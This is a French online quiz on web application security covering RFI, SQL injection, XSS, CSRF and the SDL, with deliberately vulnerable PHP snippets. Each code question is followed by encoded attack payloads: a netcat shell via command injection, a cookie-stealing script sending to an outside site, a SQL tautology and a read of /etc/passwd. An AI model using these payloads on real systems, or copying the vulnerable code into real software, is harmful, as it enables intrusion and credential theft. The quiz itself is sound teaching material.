Cybersécurité et développement

réponse obligatoire

Question 1

Quel est votre nom et prénom ?

Question 2

Une vulnérabilité de type RFI permet à un pirate

d’injecter du code dans une requête SQL

d’injecter du Javascript dans une page HTML

d’accéder à un fichier distant

d’accéder à un fichier local sur le serveur

décocher

Question 3

Pour sécuriser une application des vulnérabilités SQL Injection :

J’utilise la fonction « mysql_real_escape_string »

J’utilise un Object Relational Mapping (ORM) : ADO.NET Entity Framework pour .NET

Je filtre la chaine « <script> »

J’utilise la fonction « htmlentities »

Question 4

Avec quelle attaque la requête HTTP suivante permettra à un attaquant d’exécuter des commandes sur le système cible ?

XSS

LFI

RFI

SQL Injection

décocher

Question 5

Le code PHP suivant comporte une vulnérabilité de type…

XSS

LFI

RFI

SQL Injection

Question 6

Quelles sont les techniques permettant de sécuriser une vulnérabilité CSRF ?

Utiliser le champ REFERER

Utiliser la fonction « htmlentities » pour sécuriser les entrées utilisateurs

Demander à l’utilisateur de saisir son mot de passe

Appliquer un jeton aléatoire au formulaire

Question 7

Citer trois meilleurs pratiques permettant de sécuriser un upload de fichier JPG

Stocker les fichiers en dehors de l'application

Verifier le type MIME / l'entête du fichier

Renommer le fichier envoyé

Vérifier l'extension

Question 8

Quels sont les principaux types de menace ?

Perte de confidentialité

Perte d’intégrité

Perte de temps

Perte de disponibilité

Question 9

Utiliser des données non maîtrisées dans des instructions pouvant lancer des commandes permet de

Pouvoir être plus souple dans les commandes à exécuter

Ne pas avoir à redévelopper un morceau de code

S’exposer à une vulnérabilité de type injection de commande ou injection de code

S’exposer à une vulnérabilité de type XSS

décocher

Question 10

Utiliser des données non maîtrisées dans des instructions pouvant lancer des commandes permet de

Pouvoir être plus souple dans les commandes à exécuter

Ne pas avoir à redévelopper un morceau de code

S’exposer à une vulnérabilité de type injection de commande ou injection de code

S’exposer à une vulnérabilité de type XSS

décocher

Question 11

Retrouver le code d’exploitation du code serveur suivant :

<?php
$id_mess = $_GET['id_message'];
$query = "SELECT * FROM MSG WHERE id='$id_mess' ";

$result = mysql_query($query);
$row = mysql_fetch_object($result);

echo "<td>$message->content</td>";
?>

8.8.8.8%3B%20nc%20%E2%80%93lvp%204444%20%E2%80%93e%20%2Fbin%2Fsh

John%3Cscript%3Edocumet.location=%22http://my-website.fr/?cookie=%22%20%2B%20document.cookie;%20%3C/script%3E

1234'%20OR%20'1'='1

4%3B%20echo%20file_get_contents%28%E2%80%98%2Fetc%2Fpasswd%E2%80%99%29%3B

décocher

Question 12

Retrouver le code d’exploitation du code serveur suivant :

<?php
$ip = $_GET['ip'];
passthru("ping " . $ip);
?>

8.8.8.8%3B%20nc%20%E2%80%93lvp%204444%20%E2%80%93e%20%2Fbin%2Fsh

John%3Cscript%3Edocumet.location=%22http://my-website.fr/?cookie=%22%20%2B%20document.cookie;%20%3C/script%3E

1234'%20OR%20'1'='1

4%3B%20echo%20file_get_contents%28%E2%80%98%2Fetc%2Fpasswd%E2%80%99%29%3B

décocher

Question 13

Retrouver le code d’exploitation du code serveur suivant :

<?php
$p1 = $_GET['p1']
eval(" $res = 2 + $p1 ");
?>

8.8.8.8%3B%20nc%20%E2%80%93lvp%204444%20%E2%80%93e%20%2Fbin%2Fsh

John%3Cscript%3Edocumet.location=%22http://my-website.fr/?cookie=%22%20%2B%20document.cookie;%20%3C/script%3E

1234'%20OR%20'1'='1

4%3B%20echo%20file_get_contents%28%E2%80%98%2Fetc%2Fpasswd%E2%80%99%29%3B

décocher

Question 14

Retrouver le code d’exploitation du code serveur suivant :

<?php
$login = $_GET['login'];
echo("Bonjour " . $login);
?>

8.8.8.8%3B%20nc%20%E2%80%93lvp%204444%20%E2%80%93e%20%2Fbin%2Fsh

John%3Cscript%3Edocumet.location=%22http://my-website.fr/?cookie=%22%20%2B%20document.cookie;%20%3C/script%3E

1234'%20OR%20'1'='1

4%3B%20echo%20file_get_contents%28%E2%80%98%2Fetc%2Fpasswd%E2%80%99%29%3B

décocher

Question 15

Comment se prémunir contre une faille « include  » ?

En acceptant d’inclure que des fichiers d’un type donné

En utilisant une liste blanche de fichiers acceptés

En encodant les données utilisateur

En utilisant une liste noire d’extension

décocher

Question 16

une vulnérabilité XSS rend inopérant les jetons CSRF

Vrai

Faux

décocher

Question 18

Quels sont les principales limites d’un outil d’audit de code source libre

Vérifie les vulnérabilités avec beaucoup de faux positif

Vérifie les vulnérabilités sans trop de faux positif

Ne vérifie pas les problèmes de syntaxe

Ne remonte pas les erreurs sur les flux de fichiers

décocher

Question 19

Quelle est la règle d’or de la sécurité informatique ?

Toujours encoder ses données

Toujours chiffrer ses données

Ne jamais utiliser de framework

Ne jamais faire confiance à l’utilisateur

Ne jamais faire confiance à l’OS

décocher

Question 20

Quels sont les 3 grands types de traitement à faire systématiquement ?

Contrôle, supervision, validation

Confidentialité, disponibilité, intégrité

Validation, Filtrage, Encodage

Monitoring, sauvegarde, suivi

décocher

Question 21

Quelle est la pierre angulaire des cycles de développement permettant de grandement réduire les bugs ?

Le développement en cycle court

Les tests (unitaire, fonctionnelle, de non régression)

La compilation automatisée

L’utilisation d’un dépôt de code source (git, svn…)

décocher

Question 22

Quelle est la première brique dans le cycle SDL (Security Development Lifecycle) de Microsoft ?

L’exigence

La vérification

La formation

La conception

décocher

Question 23

Dans le cycle SDL (Security Development Lifecycle) de Miscrosoft, l’exigence est la nécessité de prendre en compte, dès le début du projet, la sécurité du produit. Quel processus le permet ?

La réduction de la surface d’attaque – défense en profondeur

La revue de code source

L’analyse des risques

L’intégration continue

La revue qualité

décocher

Question 24

Quel grand principe permet de diminuer les problèmes de sécurité de façon notable ?

La réduction de la surface d’attaque – défense en profondeur

La revue de code source

L’analyse des risques

L’intégration continue

La revue qualité

décocher

Vous aussi, créez votre questionnaire en ligne !
C'est facile et gratuit.

C'est parti !

Cybersécurité et développement

Quel est votre nom et prénom ?

Une vulnérabilité de type RFI permet à un pirate

Pour sécuriser une application des vulnérabilités SQL Injection :

Avec quelle attaque la requête HTTP suivante permettra à un attaquant d’exécuter des commandes sur le système cible ?

Le code PHP suivant comporte une vulnérabilité de type…

Quelles sont les techniques permettant de sécuriser une vulnérabilité CSRF ?

Citer trois meilleurs pratiques permettant de sécuriser un upload de fichier JPG

Quels sont les principaux types de menace ?

Utiliser des données non maîtrisées dans des instructions pouvant lancer des commandes permet de

Utiliser des données non maîtrisées dans des instructions pouvant lancer des commandes permet de

Retrouver le code d’exploitation du code serveur suivant :<?php $id_mess = $_GET['id_message']; $query = "SELECT * FROM MSG WHERE id='$id_mess' "; $result = mysql_query($query); $row = mysql_fetch_object($result); echo "<td>$message->content</td>"; ?>

Retrouver le code d’exploitation du code serveur suivant :<?php $ip = $_GET['ip']; passthru("ping " . $ip);?>

Retrouver le code d’exploitation du code serveur suivant :<?php $p1 = $_GET['p1'] eval(" $res = 2 + $p1 ");?>

Retrouver le code d’exploitation du code serveur suivant :<?php $login = $_GET['login']; echo("Bonjour " . $login);?>

Comment se prémunir contre une faille « include » ?

une vulnérabilité XSS rend inopérant les jetons CSRF

Parmi les logiciels suivant, quels sont des outils permettant d’auditer un code source

Quels sont les principales limites d’un outil d’audit de code source libre

Quelle est la règle d’or de la sécurité informatique ?

Quels sont les 3 grands types de traitement à faire systématiquement ?

Quelle est la pierre angulaire des cycles de développement permettant de grandement réduire les bugs ?

Quelle est la première brique dans le cycle SDL (Security Development Lifecycle) de Microsoft ?

Dans le cycle SDL (Security Development Lifecycle) de Miscrosoft, l’exigence est la nécessité de prendre en compte, dès le début du projet, la sécurité du produit. Quel processus le permet ?

Quel grand principe permet de diminuer les problèmes de sécurité de façon notable ?

Quels sont les principaux types de menace ?

Retrouver le code d’exploitation du code serveur suivant :

<?php
$id_mess = $_GET['id_message'];
$query = "SELECT * FROM MSG WHERE id='$id_mess' ";

$result = mysql_query($query);
$row = mysql_fetch_object($result);

echo "<td>$message->content</td>";
?>

Retrouver le code d’exploitation du code serveur suivant :

<?php
$ip = $_GET['ip'];
passthru("ping " . $ip);
?>

Retrouver le code d’exploitation du code serveur suivant :

<?php
$p1 = $_GET['p1']
eval(" $res = 2 + $p1 ");
?>

Retrouver le code d’exploitation du code serveur suivant :

<?php
$login = $_GET['login'];
echo("Bonjour " . $login);
?>

Comment se prémunir contre une faille « include  » ?

Quelle est la règle d’or de la sécurité informatique ?